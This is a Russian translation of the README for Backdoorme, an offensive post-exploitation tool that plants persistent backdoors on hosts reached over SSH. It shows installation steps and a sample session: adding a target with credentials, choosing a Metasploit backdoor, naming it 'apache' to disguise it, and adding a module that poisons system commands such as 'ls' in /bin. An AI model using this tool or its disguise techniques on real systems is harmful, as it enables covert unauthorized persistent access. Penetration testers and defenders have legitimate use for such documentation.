
мощная утилита для автоматического бэкдоринга
Такие инструменты, как metasploit, отлично подходят для эксплуатации компьютеров, но что происходит после того, как вы получили доступ к компьютеру? Backdoorme отвечает на этот вопрос, выпуская множество бэкдоров для установления постоянного доступа на длительные периоды времени.
Как только SSH-соединение установлено с целью, сильные стороны Backdoorme могут проявиться. К сожалению, Backdoorme не является инструментом для получения root-доступа — он только сохраняет этот доступ после его получения.
Пожалуйста, используйте Backdoorme только с явного разрешения — не взламывайте без спроса.
Backdoorme разделен на две части: бэкдоры и модули.
Бэкдоры — это небольшие фрагменты кода, которые прослушивают порт и перенаправляют в интерпретатор, например bash. Существует множество бэкдоров, написанных на различных языках для разнообразия.
Модули делают бэкдоры более мощными, запуская их чаще, например, каждые несколько минут или при каждой загрузке компьютера. Это помогает установить постоянный доступ.
Демонстрация:
Для запуска backdoorme сначала убедитесь, что у вас есть необходимые зависимости.
Для Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Для Python 2.7:
$ sudo python dependencies.py
Запуск backdoorme:
$ python master.py
Чтобы добавить цель:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
Чтобы использовать бэкдор, просто выполните ключевое слово "use".
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
Оттуда вы можете установить параметры, относящиеся к бэкдору. Выполните "show options" или "help", чтобы увидеть список параметров, которые можно настроить. Чтобы установить параметр, просто используйте ключевое слово "set".
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
Как и в metasploit, бэкдоры организованы по категориям.
Каждый бэкдор может быть дополнен модулями, чтобы сделать его более мощным. Чтобы добавить модуль, просто используйте ключевое слово "add".
(msf) >> add poison
+ Poison module added
Каждый модуль имеет дополнительные параметры, которые можно настроить, и если снова выполнить "help", вы сможете увидеть или установить любые дополнительные опции.
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
В настоящее время включены следующие модули:
Backdoorme поддерживает несколько различных целей одновременно, организованных по номерам при вводе. Ядро поддерживает одну "текущую" цель, к которой по умолчанию будут применяться все новые бэкдоры. Чтобы переключить цель вручную, просто добавьте номер цели после команды: "use metasploit 2" подготовит бэкдор metasploit для второй цели. Выполните "list", чтобы увидеть список текущих целей, открыто или закрыто соединение, а также какие бэкдоры и модули доступны.
Backdoorme все еще находится в зачаточном состоянии! Не стесняйтесь вносить вклад в проект — просто сделайте форк, внесите изменения и отправьте запрос на включение (pull request). Есть идея для убийственного бэкдора или что-то, что можно улучшить? Создайте issue, и мы добавим это как можно скорее! Пожалуйста, пишите нам на [email protected] с любыми вопросами.
Если вы хотите добавить свой собственный бэкдор, следуйте инструкциям в файле backdoorme/backdoors/template.py.
Если вы хотите добавить свой собственный модуль, следуйте инструкциям в файле backdoorme/modules/template.py.
Шпаргалка для разработчиков: